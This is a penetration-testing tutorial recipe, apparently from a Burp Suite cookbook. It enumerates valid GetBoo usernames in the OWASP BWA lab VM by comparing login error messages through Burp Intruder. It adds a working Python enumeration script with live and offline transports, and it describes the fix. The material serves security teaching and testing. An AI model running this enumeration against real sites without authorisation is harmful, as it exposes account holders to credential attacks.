How to do it...

Ensure Burp and the OWASP BWA VM are running, and that the Firefox browser used to view the OWASP BWA applications is configured to proxy through Burp.

  1. From the OWASP BWA landing page, click the link to the GetBoo application.
  2. Click the Log In button, and at the login screen, attempt to log in with the username admin and the password aaaaa.
  3. Note the message returned: The password is invalid. Because the application complains about the password rather than the account, we now know admin is a valid username. Let's use Burp Intruder to find more accounts.
  4. In Burp's Proxy | HTTP history tab, find the failed login request. View the Response | Raw tab to find the same overly verbose error message, The password is invalid.
  5. Flip back to the Request | Raw tab, right-click, and send this request to Intruder.
  6. Go to Burp's Intruder tab and leave the Intruder | Target tab settings as they are. Continue to the Intruder | Positions tab. Notice how Burp places payload markers around every parameter value it finds. We only need a payload marker around the username value, since the username is what we are enumerating. Click the Clear § button to remove the payload markers placed by Burp.
  7. Then, highlight the name value of admin with your cursor and click the Add § button. The password value keeps its fixed, deliberately wrong value of aaaaa.
  8. Continue to the Intruder | Payloads tab. Many testers feed a word list of commonly used usernames into the payload position. For this recipe, we will type in a few common usernames to create a custom payload list.
  9. In the Payload Options [Simple list] section, type the string user and click the Add button.
  10. Add a few more strings such as john, tom, demo, and, finally, admin to the payload-listing box.
  11. Go to the Intruder | Options tab and scroll down to the Grep – Match section. Tick the checkbox Flag result items with responses matching these expressions. Click the Clear button to remove the items currently in the list.
  12. Click Yes to confirm you wish to clear the list.
  13. Type the string The password is invalid in the textbox and click the Add button. The Grep – Match list should now contain only this one expression.
  14. Click the Start attack button located at the top of the Options page. A pop-up window appears displaying the payloads defined, as well as the new column we added under the Grep – Match section. This pop-up window is the attack results table.
  15. The attack results table shows that every request returned a status code of 200, so the status code alone tells us nothing. The Grep – Match column does: two of the payloads, john and tom, did not produce the message The password is invalid. Instead, those two payloads returned a message of The user does not exist.
  16. The attack results table therefore demonstrates a username enumeration vulnerability: the overly verbose error message The password is invalid confirms that a user account exists on the system, while The user does not exist confirms that it does not.

This means we are able to confirm that accounts already exist in the system for the users user, demo, and admin. The fix is for the application to return one generic message, such as Invalid username or password, for both failure cases; when retesting after such a fix, compare response length and timing as well as the text, because a subtler difference leaks the same information.
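The same differential check can be scripted, which is useful for a larger word list or for retesting after a fix. The following is an added example written for this recipe, not code from the book or from GetBoo. It sends the recipe's fixed wrong password aaaaa with each candidate username and classifies the response by which error message it contains. The GetBoo URL and the password field name are assumptions (read the real values from the failed login request in Burp's Proxy | HTTP history); the username field name, name, is the one the recipe highlights. A constructed offline stand-in for the login page is included so the script runs without the VM, alongside a stand-in for a hardened login page that returns one generic message.

```python
"""Username enumeration via differential login error messages.

Added example for this recipe. Values marked ASSUMED are placeholders,
not verified GetBoo values; take them from the request captured in Burp.
"""
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

# The two error strings the recipe observed in GetBoo responses.
MSG_BAD_PASSWORD = "The password is invalid"
MSG_NO_USER = "The user does not exist"

# ASSUMED: form action URL and password field name. The username field
# name "name" is the parameter the recipe puts the payload marker on.
LOGIN_URL = "http://192.168.56.101/getboo/login.php"
USER_FIELD = "name"
PASS_FIELD = "password"
WRONG_PASSWORD = "aaaaa"  # deliberately wrong, as in the recipe


def classify_response(body: str) -> str:
    """Map a login response body to what it leaks about the username."""
    if MSG_BAD_PASSWORD in body:
        return "exists"   # the password was checked, so the account is valid
    if MSG_NO_USER in body:
        return "absent"
    return "unknown"      # neither message: inspect length/timing by hand


def enumerate_users(usernames: List[str],
                    send: Callable[[str, str], str]) -> Dict[str, str]:
    """Try each username with the fixed wrong password; return verdicts."""
    return {u: classify_response(send(u, WRONG_PASSWORD)) for u in usernames}


def http_send(username: str, password: str,
              url: str = LOGIN_URL, timeout: float = 10.0) -> str:
    """Live transport: POST the login form and return the response body."""
    data = urllib.parse.urlencode({USER_FIELD: username,
                                   PASS_FIELD: password}).encode()
    req = urllib.request.Request(url, data=data)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed offline stand-in for the GetBoo login page, mirroring what
# the recipe's Intruder run observed: user, demo and admin exist; john and
# tom do not.
_FAKE_ACCOUNTS = {"user", "demo", "admin"}


def fake_send(username: str, password: str) -> str:
    """Verbose login page: leaks whether the account exists."""
    if username in _FAKE_ACCOUNTS:
        return "<html><body>The password is invalid</body></html>"
    return "<html><body>The user does not exist</body></html>"


def hardened_send(username: str, password: str) -> str:
    """Constructed hardened login page: one generic message for both cases."""
    return "<html><body>Invalid username or password</body></html>"


if __name__ == "__main__":
    payloads = ["user", "john", "tom", "demo", "admin"]
    # Swap fake_send for http_send to run against the real VM.
    for name, verdict in enumerate_users(payloads, fake_send).items():
        print(f"{name:8s} {verdict}")
```

Against the verbose stand-in the script reports user, demo and admin as existing and john and tom as absent, which matches the Grep – Match column in the attack results table; against the hardened stand-in every verdict is unknown, which is the outcome a fixed application should produce.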
